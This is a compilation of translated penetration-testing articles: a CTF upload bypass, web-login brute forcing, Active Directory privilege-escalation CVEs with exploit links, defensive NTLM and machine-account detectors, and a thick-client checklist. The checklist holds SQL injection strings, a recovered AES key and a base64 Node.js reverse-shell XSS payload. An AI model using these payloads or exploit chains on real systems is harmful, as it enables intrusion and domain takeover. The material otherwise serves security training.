        die("I don't want pictures, Xiong Da");
    }
    $content=file_get_contents($temp_file);
    if(waf($content)){
        die('Oh, what are you doing, little heizi.');
    }
    $new_file_name=md5($file_name).'.'.$ext;
    $img_path=UPLOAD_PATH . '/' . $new_file_name;
    if (move_uploaded_file($temp_file, $img_path)){
        $is_upload=true;
    } else {
        $msg='Upload Failed!';
        die();
    }
    echo $msg.' '.$img_path;

The bit operator | is not filtered. Taking | as an example, use GlobIterator to find the flag:

import re
preg='\*'
def convertToURL(s):
    if s < 16:
        return '%0' + str(hex(s).replace('0x', ''))
    else:
        return '%' + str(hex(s).r
-
Title: Record a web login kill penetration test
During the penetration test, there are a lot of web login pages. So what ideas should we use to conduct a test? Let’s take a look at some of my testers’ ideas. Test ideas How will it penetrate when you see a web login box like this? We can see that there is no verification code when logging in, and there will be a blasting problem. So what will the usernames of blasting exist in general 1.admin 2.test 3.root Here you can also find the operator test of the corresponding system, collect and manage accounts, and increase the chance of blasting. Blasting was carried out here, but there was no result Directory scanning We can scan the directory. Maybe some scanned directories have not been authenticated and can be accessed directly. After the above methods are not authorized by JS files, we will look at the JS files next Found that there is a /SystemMng/Index url in index.js We try to splice access After splicing it in, I found that there was nothing. Are you ready to give up? Don't worry, let's see if JS has found a surprise The splicing of several pieces is quite harmful. Take one to continue to use for everyone Combination punch weak password explosion has reached this point, we have obtained the administrator's account and phone number, and we can also reset their password directly (take the correct account and try to explode) You can see that password is encrypted and found as m5. We can use the transcoding and blasting provided by burp. The blasting is successful, the account is relatively complicated. I can't get the username without the previous operation. Login successfully Log in and return package test. Enter the logged-in account password at will. Log in and grab the package. After modifying his authentication data After modification, it was found that there was no data for jumping. There was still a leak in JS. The same method The overreach has now obtained the account password of an ordinary user. 
Then we should try a privilege bypass, vertical or horizontal. Log in with the brute-forced account and capture packets. Experts here may look at the request and response packets several times while digging. When constructing requests, I thought it was a verification ID; after a few more rounds of testing I found that only the code parameter was checked. Unauthorized access then obtains all permissions on the website.
Original link: https://xz.aliyun.com/t/11612
-
Title: Red Team | Summary of important loopholes in domain penetration
1. MS14-068 (Kerberos authentication, PAC not validated)
When a user requests a TGT (the identity credential issued by the ticket-granting service) from the Kerberos Key Distribution Center (KDC), the user can forge their own Kerberos ticket.
Vulnerability effect: elevate any domain user to domain admin permissions
Conditions of use:
1. The domain controller is older than 2012 R2 and lacks the MS14-068 patch (KB3011780)
2. Access to a domain-joined computer
3. The password and SID of a domain user in that domain
How to use: explained in detail in the article 《Kerberos认证及过程中产生的攻击》, available at https://cloud.tencent.com/developer/article/1760132

2. CVE-2020-1472 (Zerologon)
The NetLogon privilege escalation vulnerability (CVE-2020-1472) is a serious remote privilege escalation vulnerability in Windows domain controllers. The default IV of the AES-based authentication algorithm used by Netlogon is all zeros, which lets an attacker bypass authentication. The remote interface that sets the domain controller's password relies on the same function, so the domain controller machine account's password can be set to empty.
From there we can dump the domain hashes and finally recover the domain controller machine account's password.
Vulnerability effect: this vulnerability can be used to obtain domain admin access
Affected versions:
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)
How to use:
Preparation tools:
Impacket toolkit: https://github.com/SecureAuthCorp/impacket.git
poc: https://github.com/SecuraBV/CVE-2020-1472.git
exp: https://github.com/dirkjanm/CVE-2020-1472
exp: https://github.com/risksense/zerologon
https://cloud.tencent.com/developer/article/1780108
https://cloud.tencent.com/developer/article/1837483

3. CVE-2021-42287 / CVE-2021-42278 (noPac)
The Windows Active Directory Domain Services privilege elevation vulnerability (CVE-2021-42287, CVE-2021-42278) exists because AD DS does not enforce appropriate security restrictions, so those restrictions can be bypassed to escalate privileges.
An attacker can exploit it to elevate an ordinary domain user to domain administrator.
Vulnerability effect: elevate any domain user to domain admin permissions
Affected versions:
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows Server, version 20H2 (Server Core Installation)
Windows Server, version 2004 (Server Core installation)
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Conditions of use:
(1) An ordinary domain member account
(2) Domain users are allowed to create machine accounts (the usual default)
(3) The DC has not been patched with KB5008380 or KB5008602
How to use:
https://github.com/WazeHell/sam-the-admin
https://github.com/Ridter/noPac
https://blog.csdn.net/FHLZLHQ/article/details/121964692

4. CVE-2021-1675 / CVE-2021-34527 (PrintNightmare)
This vulnerability was initially tracked as CVE-2021-1675; Microsoft later assigned CVE-2021-34527 and noted that the two are very similar but have different attack vectors. Print Spooler is the Windows service that manages printing: it handles all local and network print queues and controls all print jobs.
The Print Spooler service is enabled by default on Windows, and an ordinary user can use this vulnerability to elevate to SYSTEM permissions.
Vulnerability effect: an unauthenticated remote attacker can exploit this vulnerability to execute arbitrary code on the domain controller with SYSTEM permissions, thereby gaining control of the entire domain
Affected versions:
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows RT 8.1
Windows 8.1 for x64-based systems
Windows 8.1 for 32-bit systems
Windows 7 for x64-based Systems Service Pack 1
Windows 7 for 32-bit Systems Service Pack 1
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server, version 2004 (Server Core installation)
Windows 10 Version 2004 for x64-based Systems
Windows 10 Version 2004 for ARM64-based Systems
Windows 10 Version 2004 for 32-bit Systems
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Utilization scenarios
In a workgroup environment, the highest system privileges can be obtained through this vulnerability; in a domain environment, attacking the domain controller directly yields SYSTEM permissions on the DC and arbitrary code execution; it can also be used for persistence. After obtaining the DC, where a shared directory exists and the DC can reach it, a DLL in that share can be loaded remotely.
Conditions of utilization
The target has the Spooler service enabled; a domain account with ordinary permissions; the SMB server you stand up allows anonymous access, so that the target can fetch the file directly.
How to use
https://github.com/cube0x0/CVE-2021-1675
https://github.com/cube0x0/impacket
https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer
https://bewhale.github.io/posts/29501.html
https://mp.weixin.qq.com/s/1sR0wTyJFf5UnuPjtJ-DWw

5. CVE-2019-1040
In June 2019 Microsoft released a security update fixing CVE-2019-1040. With this vulnerability an attacker can bypass NTLM MIC (Message Integrity Check) protection through a man-in-the-middle attack and relay authentication traffic to a target server.
Vulnerability effect
With only one ordinary domain account, this attack lets an attacker remotely control any machine in the Windows domain, including the domain controller.
Affected versions
Windows 7 SP1 to Windows 10 1903
Windows Server 2008 to Windows Server 2019
Utilization scenarios
For specific environments, two attack methods have been identified for the CVE-2019-1040 attack chain:
1. Attack the Exchange Server in the domain (described below)
2. Attack the domain's AD server (combined with resource-based constrained delegation)
Conditions of utilization
A. The Exchange server can be any version (including versions patched for PrivExchange). The only requirement is that Exchange has high privileges by default, as it does when installed in shared permissions or RBAC mode.
B. Any account in the domain (the only requirement for triggering the SpoolService bug is an authenticated in-domain account).
C. The essence of CVE-2019-1040 is a defect in NTLM packet integrity verification, so the NTLM authentication packet can be modified without invalidating the authentication. In this attack chain, the attacker removes the flag in the packet that prevents relaying from SMB to LDAP.
D. A request is constructed that makes the Exchange server authenticate to the attacker, and that authentication is relayed to the domain controller over LDAP, so the relayed victim's permissions can be used to perform operations in Active Directory, for example granting DCSync permissions to the attacker's account.
E. If a user exists in a trusted but completely different AD forest, exactly the same attack can be carried out in that domain (because any authenticated user can trigger a SpoolService reverse connection).
Vulnerability exploit attack chain
1. Use any account in the domain to connect to the targeted Exchange server over SMB, specifying the relay server; at the same time, trigger the reverse SMB connection using the SpoolService bug.
2. The connection comes back to the attacker's host over SMB; ntlmrelayx then uses CVE-2019-1040 to modify the NTLM authentication data and relays the SMB request to LDAP.
3. Using the relayed LDAP authentication, the Exchange server's identity grants DCSync permissions to the attacker's account.
4. The attacker's account uses DCSync to dump the password hashes of all domain users in the AD domain (including the domain administrator's, at which point the entire domain is compromised).
How to use:
https://github.com/SecureAuthCorp/impacket
https://github.com/dirkjanm/krbrelayx
https://github.com/Ridter/CVE-2019-1040
https://github.com/Ridter/CVE-2019-1040-dcpwn
In the same network segment: https://www.freebuf.com/vuls/274091.html
Through a tunnel: https://zhuanlan.zhihu.com/p/142080911
CVE-2019-1040 + RBCD (resource-based constrained delegation) + PetitPotam

6. Domain delegation attacks
https://mp.weixin.qq.com/s/GdmnlsKJJXhElA4GuwxTKQ

7. NTLM relay
https://www.anquanke.com/post/id/193149
https://www.anquanke.com/post/id/193493
https://www.anquanke.com/post/id/194069
https://www.anquanke.com/post/id/194514

8. ADCS vulnerability: ESC8 (PetitPotam, ADCS relay)
ESC8 is an HTTP NTLM relay, possible because ADCS authentication supports NTLM.
Vulnerability effect: elevate an ordinary domain user to domain admin permissions
Conditions of use:
1. ADCS is unpatched
2. There are two domain controllers
3. The ADCS service is present
How to use:
https://blog.csdn.net/qq_43645782/article/details/119322322
https://forum.butian.net/share/1583

9. ADCS vulnerability: CVE-2022-26923
Vulnerability impact: allows a low-privileged user to elevate to domain administrator in a default Active Directory environment where the Active Directory Certificate Services (AD CS) server role is installed.
Vulnerable component: Active Directory Certificate Services (AD CS)
Brief description: the attacker creates a machine account and tampers with its dNSHostName attribute; AD CS embeds dNSHostName into the certificate when one is requested, so the machine account obtains a high-privileged domain controller identity.
Affected Windows versions:
Windows 8.1
Windows 10 Version 1607, 1809, 1909, 2004, 20H2, 21H1, 21H2
Windows 11
Windows Server 2008, 2012, 2016, 2019, 2022
Utilization prerequisites:
CVE-2022-26923/CVE-2022-26931 is similar to the 2021 CVE-2021-42278/CVE-2021-42287 sAMAccountName spoofing vulnerability: both forge a domain controller's name and identity to carry out privilege escalation. Its prerequisites are:
The privilege escalation applies to all Windows Server Active Directory versions, including Windows Server 2012 R2 through Windows Server 2022 currently within Microsoft's product support, and older Windows Server versions beyond product support.
The intruder controls at least one Active Directory user account that holds the "Validated write to DNS host name" permission on at least one computer account in the directory. By default, a single ordinary Active Directory domain user can join or create (including creating an empty account) 10 computer accounts in the directory and holds CREATOR OWNER administrative permissions (including "Validated write to DNS host name") on the computer accounts they joined or created, so this permission is easy to obtain.
An enterprise certificate service is deployed in the Active Directory and allows the controlled computer account above to request a computer authentication certificate. Enterprise Certificate Services is a widely deployed basic service in Active Directory, and by default the AD-integrated enterprise CA allows in-domain computers to request computer authentication certificates.
Reproduction reference:
https://forum.butian.net/share/1578
https://forum.butian.net/share/1583

10. Exchange related: controlling the Exchange server
Exchange plays an important role in the domain.
Generally speaking, getting permissions on the Exchange server is basically equivalent to getting domain admin permissions. When you get the Exchange server, there is a high probability that the domain admin logs in there directly, or has logged in before. Once you have Exchange server permissions, try to dir the domain controller's C drive directly to see whether you have access. If not, try using mimikatz to dump credentials; there is a high probability of obtaining the domain admin or another high-privileged user directly. Moreover, even on newer server versions, plaintext passwords can be recovered on Exchange.

11. CVE-2018-8581 (to take the domain controller)
Vulnerability description: this vulnerability exploits SSRF and the high-privileged requests made by Exchange servers, so that a user with legitimate mailbox credentials is elevated to domain admin permissions.
Scope of impact: Exchange Server 2010, Exchange Server 2013, Exchange Server 2016
Conditions of use: by default the attacker holds legitimate mailbox user credentials. Because the exploit escalates through NTLM relay, the attacker also needs a host already available in the intranet.
Vulnerability introduction: the vulnerability arises from several things. First, Exchange allows any authenticated user to create a push subscription through the EWS interface and to specify any URL as the notification destination. Second, when the push is triggered, Exchange uses the DefaultCredentials property of the CredentialCache class.
Since EWS runs with SYSTEM permission, the HTTP request issued with DefaultCredentials initiates NTLM authentication with that identity. Third, in EWS requests, a SerializedSecurityContext header specifying a SID allows identity masquerading, so EWS calls can be performed as the specified user. In other words: we can make the Exchange server initiate an NTLM authentication over HTTP to us, which gives us the Net-NTLM hash of the Exchange machine account.
Since this exploit involves NTLM relay, the obvious idea is to relay the credentials to the domain controller. Because the relayed NTLM credentials belong to the Exchange server's machine account, and, as described in the Relay To LDAP section, the Exchange machine account has write-ACL permission, it can grant any user DCSync permission and so dump all password hashes.
Whether the server requires signing: the server we relay to is LDAP. As covered in the earlier [LDAP signing] section, the LDAP server's default policy is to negotiate signing, so whether to sign is decided by the client. For the client it depends on the protocol: SMB requires signing by default, while WebDAV and HTTP do not. The request in this vulnerability is HTTP, so we don't have to do anything and no signing is required.
EXP: https://github.com/Ridter/Exchange2domain
#You can also use ntlmrelayx.py + privexchange.py + secretsdump.py
https://github.com/dirkjanm/privexchange
https://github.com/SecureAuthCorp/impacket
For reproduction, refer to this article: https://www.jianshu.com/p/e081082cbc73

CVE-2020-0688 (RCE)
Vulnerability description: when an attacker obtains, by whatever means, a user account password that can access the Exchange Control Panel (ECP) component, they can execute arbitrary code on the attacked Exchange server and directly obtain server permissions.
Utilization conditions: Exchange Server 2010 SP3 / 2013 / 2016 / 2019, an ordinary account.
Attack scripts:
https://github.com/zcgonvh/CVE-2020-0688
https://github.com/random-robbie/cve-2020-0688
Reproduction: https://www.anquanke.com/post/id/226543#h3-13

12. CVE-2020-17144 (RCE)
Vulnerability description: a remote attacker can bypass authentication and exploit the vulnerability by constructing special cmdlet parameters.
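The defensive counterpart of section 5 above is the consistency check Microsoft's fix performs: the NTLMv2 response, which is signed with the client's key, announces a MIC through the MsvAvFlags AV pair, so an AUTHENTICATE message whose MIC field is zeroed or absent while that bit is set has been tampered with in transit. The parser below is an added example written for this page (not code from any tool linked above); it follows the MS-NLMP message layout, and the messages it checks are constructed inline rather than captured traffic.

```python
import struct

NTLMSSP_SIG = b"NTLMSSP\x00"
AUTHENTICATE = 3
MSV_AV_EOL = 0x0000
MSV_AV_FLAGS = 0x0006
AV_FLAG_MIC_PRESENT = 0x00000002
MIC_OFFSET = 72   # fixed part of AUTHENTICATE_MESSAGE ends here; MIC (16 bytes) follows
MIC_LEN = 16
FIELD_OFFSETS = (12, 20, 28, 36, 44, 52)  # Lm, Nt, Domain, User, Workstation, SessionKey


def _field(buf, off):
    """Decode an NTLM Fields entry: Len (2), MaxLen (2), BufferOffset (4), little endian."""
    length, _maxlen, offset = struct.unpack_from("<HHI", buf, off)
    return length, offset


def parse_av_pairs(nt_resp):
    """Return {AvId: value} from an NTLMv2_RESPONSE.

    Layout: NTProofStr(16) RespType(1) HiRespType(1) Reserved(2) Reserved(4)
    TimeStamp(8) ClientChallenge(8) Reserved(4) AvPairs(...)."""
    pairs = {}
    pos = 16 + 1 + 1 + 2 + 4 + 8 + 8 + 4
    while pos + 4 <= len(nt_resp):
        av_id, av_len = struct.unpack_from("<HH", nt_resp, pos)
        pos += 4
        if av_id == MSV_AV_EOL:
            break
        pairs[av_id] = nt_resp[pos:pos + av_len]
        pos += av_len
    return pairs


def check_authenticate(msg):
    """Classify one AUTHENTICATE_MESSAGE: ('ok'|'suspicious'|'skip'|'invalid', reason)."""
    if len(msg) < 64 or msg[:8] != NTLMSSP_SIG or struct.unpack_from("<I", msg, 8)[0] != AUTHENTICATE:
        return "invalid", "not an NTLMSSP AUTHENTICATE message"
    nt_len, nt_off = _field(msg, 20)
    if nt_len < 44:
        return "skip", "NTLMv1 response carries no AV pairs"
    nt_resp = msg[nt_off:nt_off + nt_len]
    # The MIC field exists only when every non-empty payload buffer starts at or
    # beyond offset 88; an older client may legitimately omit it altogether.
    starts = [off for ln, off in (_field(msg, o) for o in FIELD_OFFSETS) if ln]
    has_mic_field = min(starts, default=88) >= MIC_OFFSET + MIC_LEN
    mic = msg[MIC_OFFSET:MIC_OFFSET + MIC_LEN] if has_mic_field else b""
    flags = struct.unpack("<I", parse_av_pairs(nt_resp).get(MSV_AV_FLAGS, b"\0\0\0\0")[:4])[0]
    if flags & AV_FLAG_MIC_PRESENT and (not has_mic_field or mic == b"\0" * MIC_LEN):
        return "suspicious", "client-signed MsvAvFlags announce a MIC, but the MIC is missing or zeroed"
    return "ok", "MIC field and MsvAvFlags agree"


def build_authenticate(announce_mic, keep_mic):
    """Build a constructed (not captured) AUTHENTICATE_MESSAGE with a dummy NTLMv2 response."""
    av = struct.pack("<HHI", MSV_AV_FLAGS, 4, AV_FLAG_MIC_PRESENT if announce_mic else 0)
    av += struct.pack("<HH", MSV_AV_EOL, 0)
    nt_resp = b"\x11" * 16 + b"\x01\x01" + b"\0" * 6 + b"\0" * 8 + b"\x22" * 8 + b"\0" * 4 + av
    user = "alice".encode("utf-16-le")
    hdr_len = MIC_OFFSET + MIC_LEN
    msg = NTLMSSP_SIG + struct.pack("<I", AUTHENTICATE)
    msg += struct.pack("<HHI", 0, 0, hdr_len)                                # LmChallengeResponse
    msg += struct.pack("<HHI", len(nt_resp), len(nt_resp), hdr_len)          # NtChallengeResponse
    msg += struct.pack("<HHI", 0, 0, hdr_len)                                # DomainName
    msg += struct.pack("<HHI", len(user), len(user), hdr_len + len(nt_resp))  # UserName
    msg += struct.pack("<HHI", 0, 0, hdr_len)                                # Workstation
    msg += struct.pack("<HHI", 0, 0, hdr_len)                                # EncryptedRandomSessionKey
    msg += struct.pack("<I", 0xE2888215)                                     # NegotiateFlags (sample)
    msg += bytes([10, 0, 0x63, 0x45, 0, 0, 0, 0x0F])                         # Version (sample)
    msg += (b"\xAB" * MIC_LEN) if keep_mic else (b"\0" * MIC_LEN)            # MIC, or zeroed MIC
    assert len(msg) == hdr_len
    return msg + nt_resp + user


if __name__ == "__main__":
    print("legitimate :", check_authenticate(build_authenticate(True, True)))
    print("mic dropped:", check_authenticate(build_authenticate(True, False)))
```

On a real capture, feed the NTLMSSP blob from the SMB or LDAP bind, GSS-API wrapper stripped, to check_authenticate.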
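Sections 3 and 9 above both depend on machine-account attributes that stop matching the account's own name: a sAMAccountName stripped of its trailing $ (CVE-2021-42278) and a dNSHostName rewritten to a domain controller's name (CVE-2022-26923). The audit below is an added example for this page, not code from the linked tools; it flags both patterns over an account export, and DOMAIN, DC_NAMES and the records are constructed values.

```python
DOMAIN = "redteam.lab"      # constructed sample domain
DC_NAMES = {"DC01"}         # constructed: hostnames of the real domain controllers


def expected_dns_host_name(sam, domain):
    """A computer account 'HOST$' is normally paired with dNSHostName 'host.<domain>'."""
    return f"{sam.rstrip('$').lower()}.{domain.lower()}"


def audit_computer(acct, domain=DOMAIN, dc_names=DC_NAMES):
    """Return the findings for one computer-object record (empty list if clean).

    acct: dict with sAMAccountName, dNSHostName (may be None) and optionally
    mS-DS-CreatorSID, which AD sets only on accounts created by a non-admin
    user through ms-DS-MachineAccountQuota."""
    findings = []
    dcs = {d.upper() for d in dc_names}
    sam = acct.get("sAMAccountName", "")
    short = sam.rstrip("$").upper()
    if not sam.endswith("$"):
        findings.append("sAMAccountName lacks trailing '$' (CVE-2021-42278 rename pattern)")
        if short in dcs:
            findings.append("sAMAccountName now collides with a domain controller name")
    dns = acct.get("dNSHostName")
    if dns:
        expected = expected_dns_host_name(sam, domain)
        if dns.lower() != expected:
            findings.append(f"dNSHostName {dns!r} does not match expected {expected!r}")
        if dns.split(".")[0].upper() in dcs and short not in dcs:
            findings.append("dNSHostName claims a domain controller's name (CVE-2022-26923 pattern)")
    if findings and acct.get("mS-DS-CreatorSID"):
        findings.append("account was created through MachineAccountQuota by " + acct["mS-DS-CreatorSID"])
    return findings


def audit_all(records, domain=DOMAIN, dc_names=DC_NAMES):
    """Map sAMAccountName -> findings for every record that has at least one."""
    result = {}
    for rec in records:
        found = audit_computer(rec, domain, dc_names)
        if found:
            result[rec.get("sAMAccountName", "?")] = found
    return result


# Constructed sample export; the SIDs are placeholders, not real values.
SAMPLE_RECORDS = [
    {"sAMAccountName": "DC01$", "dNSHostName": "dc01.redteam.lab"},
    {"sAMAccountName": "WS07$", "dNSHostName": "ws07.redteam.lab"},
    # noPac step: a quota-created machine account renamed to drop its '$'
    {"sAMAccountName": "DC01", "dNSHostName": "evil01.redteam.lab",
     "mS-DS-CreatorSID": "S-1-5-21-<placeholder>-1105"},
    # CVE-2022-26923 step: dNSHostName rewritten to the DC's name before enrolling
    {"sAMAccountName": "EVIL02$", "dNSHostName": "dc01.redteam.lab",
     "mS-DS-CreatorSID": "S-1-5-21-<placeholder>-1105"},
]

if __name__ == "__main__":
    for name, found in audit_all(SAMPLE_RECORDS).items():
        print(name)
        for line in found:
            print("  -", line)
```

The same checks apply to Event ID 4742 (computer account changed) data, which records the old and new sAMAccountName and dNSHostName values as they are modified.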
-
Title: Penetration Test C Client (C-S Architecture) checklist
0x00 Introduction
This project mainly targets penetration testing of PC clients (C/S architecture), combining our own testing experience and material from the web into a checklist. If you have any questions, please contact us; we look forward to everyone contributing more techniques and cases.

0x01 Overview
PC client: a GUI with rich functionality, C/S architecture.

0x02 Development languages
C# (.NET), Java, Delphi, C, C++.

0x03 Protocols
TCP, HTTP(S), TDS.

0x04 Databases
Oracle, MSSQL, DB2.

0x05 Test tools
//Related tools download: https://github.com/theLSA/hack-cs-tools
dvta: PC client practice target
ida pro: static analysis tool
ollydbg: dynamic analysis tool
CFF Explorer: PE file analysis
PEID: packer detection tool
exeinfope/studype: PE file analysis
wireshark: observe traffic
tcpview: observe TCP connections
echo Mirage: can intercept TCP traffic
burpsuite: HTTP(S) packet capture
proxifier: global traffic proxy
procmon: file and registry monitoring
regshot: registry change comparison
process Hacker: process analysis
RegfromApp: registry monitoring
WSExplorer: per-process packet capture tool
strings: view the program's strings
.NET (de)compilation: dotpeek, de4dot, dnspy, ilspy, sae, ildasm, ilasm
Java decompilation: jad, jd-gui, jadx, dex2jar; online: javare.cn, www.javadecompilers.com
Reflexil: assembly editor (can be used as an ilspy plugin)
Vcg: automated code auditing tool
BinScope: BinScope

0x06 Proxy settings
Most clients have no proxy configuration of their own and need a global proxy set up manually, as follows:
1) IE - Internet settings - Connections - LAN settings.
2) proxifier - proxy server / proxification rules
//HTTP traffic can be combined with burpsuite for convenient testing (set the proxy server to burp's proxy address).

0x07 Test points
0. Information collection
Compilation information, development environment/language, protocol used, database, IP, obfuscation/encryption, whether packed, etc.
Case 0 - Use CFF to view client information (such as the compilation environment) (dvta)

1. Reverse engineering
Decompilation, source code leakage, hard-coded keys/passwords, encryption and decryption logic, role-judgment logic (0-admin, 1-normaluser), backdoors, etc.
Case 0 - Decompile to obtain the encryption/decryption logic and write a decryption tool (dvta)
Information obtained through this logic:
Encrypted Text: CTsvjZ0jQghXYWbSRcPxpQ==
AES KEY: J8gLXc454o5tW2HEF7HahcXPufj9v8k8
IV: fq20T0gMnXa6g0l4
Write the decryption tool:

    using System;
    using System.Collections.Generic;
    using System.ComponentModel;
    using System.Data;
    using System.Drawing;
    using System.Linq;
    using System.Text;
    using System.Threading.Tasks;
    using System.Windows.Forms;
    using System.Security.Cryptography;

    namespace aesdecrypt
    {
        public partial class aesdecrypt : Form
        {
            public aesdecrypt()
            {
                InitializeComponent();
            }

            // Button handler: decrypt the recovered ciphertext with the recovered AES-256-CBC key and IV
            private void decrypt(object sender, EventArgs e)
            {
                String key = "J8gLXc454o5tW2HEF7HahcXPufj9v8k8";
                String IV = "fq20T0gMnXa6g0l4";
                String encryptedtext = "CTsvjZ0jQghXYWbSRcPxpQ==";
                byte[] encryptedBytes = Convert.FromBase64String(encryptedtext);
                AesCryptoServiceProvider aes = new AesCryptoServiceProvider();
                aes.BlockSize = 128;
                aes.KeySize = 256;
                aes.Key = System.Text.ASCIIEncoding.ASCII.GetBytes(key);
                aes.IV = System.Text.ASCIIEncoding.ASCII.GetBytes(IV);
                aes.Padding = PaddingMode.PKCS7;
                aes.Mode = CipherMode.CBC;
                ICryptoTransform crypto = aes.CreateDecryptor(aes.Key, aes.IV);
                byte[] decryptedbytes = crypto.TransformFinalBlock(encryptedBytes, 0, encryptedBytes.Length);
                String decryptedString = System.Text.ASCIIEncoding.ASCII.GetString(decryptedbytes);
                Console.WriteLine("\n");
                Console.WriteLine("################Decrypt Database password############\n");
                Console.WriteLine("Decrypted Database password:" + decryptedString + "\n");
                Console.WriteLine("################Done###############\n");
            }
        }
    }
    //The decryption code originated from https://resources.infosecinstitute.com/damn-vulnerable-thick-client-app-part-5/#article

Case 1 - Decompile and modify the code logic so that an ordinary user logs in as administrator (dvta)
1 = Isadmin, 0 = Normaluser; change the 1 to 0 in the admin check.

2. Information leakage
Plaintext sensitive information, sensitive files (such as xxx.config in the installation directory).
Registry: use regshot to compare the registry before and after a client action (such as login).
Development/debug log leaks (such as dvta.exe log.txt).
Process Hacker: view plaintext sensitive data (such as account passwords/keys) in the client's memory.
strings: directly view the client's strings (such as IP information).
Review the source code (such as on github, gitee, etc.).
Case 0 - Configuration file leaks sensitive information (dvta)
Case 1 - Database account password leaked in memory (dvta)
Case 2 - Hard-coded ftp account password in the source code (dvta)
Case 3 - Development/debug log leak (dvta)
Case 4 - A certain system saves the account password locally after login //This case comes from https://blog.csdn.net/weixin_30685047/article/details/95916065

3. Transmission traffic
wireshark / echo Mirage / burpsuite+nopeproxy / fiddler / charles
Account passwords transmitted in plaintext by protocols such as ftp.
SQL statements transmitted in plaintext (usable for constructing injection, privilege bypass, etc.).
Case 0 - Zhengfang Academic Affairs System transmits SQL statements in plaintext and returns plaintext data //This case comes from wooyun
Case 1 - The response packet returns the database account password at a certain system's login

4. Other vulnerabilities
Username enumeration: Case 0
Brute force: such as the login function. Case 0
Weak passwords: try admin / 123456, etc.
Plaintext transmission of personal data
SQL statements exposed: Case 0, Case 1
SQL injection
For login, universal passwords such as xxx' or 'x'='x and xxx' or 1=1--
At an input box, construct a closing quote and an error, such as ', '), %'), order by 100--, etc. Data is extracted through display positions or error messages. The principle is the same as web injection, and the different databases behave similarly.
Case 0 - Oracle injection
    ' union select null,null,(select user from dual),null,null,(select banner from sys.v_$version where rownum=1),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null from dual--
Case 1 - MSSQL injection
    111') and (select user)>0--
CSV injection
If the client exports to Excel, enter 1+1 and check whether it becomes 2 after export.
XSS
Such as Electron, NodeWebKit, etc.
Case 0 - AntSword (中国蚁剑) XSS to RCE
Environment: win7 + phpstudy (php5.6.27-nts) + perl + nc + antsword 2.0.5
XSS webshell:
    <?php header('HTTP/1.1 500 <img src=# onerror=alertx>');
windows + node.js: success
    var net=require('net'), sh=require('child_process').exec('cmd.exe'); var client=new net.Socket(); client.connect(6677, '127.0.0.1', function(){client.pipe(sh.stdin);sh.stdout.pipe(client); sh.stderr.pipe(client);});
    <?php header('HTTP/1.1 500 Not <img src=# onerror='eval(new Buffer(dmFyIG5ldCA9IHJlcXVpcmUoIm5ldCIpLCBzaCA9IHJlcXVpcmUoImNoaWxkX3Byb2Nlc3MiKS5leGVjKCJjbWQuZXhlIik7CnZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwpjbGllbnQuY29ubmVj dCg2Njc3LCAiMTI3LjAuMC4xIiwgZnVuY3Rpb24oKXtjbGllbnQucGlwZShzaC5zdGRpbik7c2guc3Rkb3V0LnBpcGUoY2xpZW50KTsKc2guc3RkZXJyLnBpcGUoY2xpZW50KTt9KTs=,base64).toString())'>');
Related reference: https://www.anquanke.com/post/id/176379
Command execution
Case 0 - Evernote Windows Client 6.15 local file read and remote command execution: http://blog.knownsec.com/2018/11/%E5%8D%B0%E8%B1%A1%E7%AC%94%E8%AE%B0-windows-%E5%AE%A2%E6%88%B7%E7%AB%AF-6-15-%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E5%92%8C%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/
Case 1 - A cloud PC client command execution discovery process: https://www.secpulse.com/archives/53852.html
Case 2 - Kingsoft WPS Mail client remote command execution vulnerability (exploitation tips for Mozilla XUL-based programs): https://shuimugan.com/bug/view?bug_no=193117
The test points are the same as for the web.
DLL hijacking
Linux file search order: the current directory, then the directories listed in PATH, in order.
Windows DLL search order (when no absolute path is given):
1. The directory from which the application loaded.
2. The current directory.
3. The system directory (C:\Windows\System32\).
4. The 16-bit system directory.
5. The Windows directory.
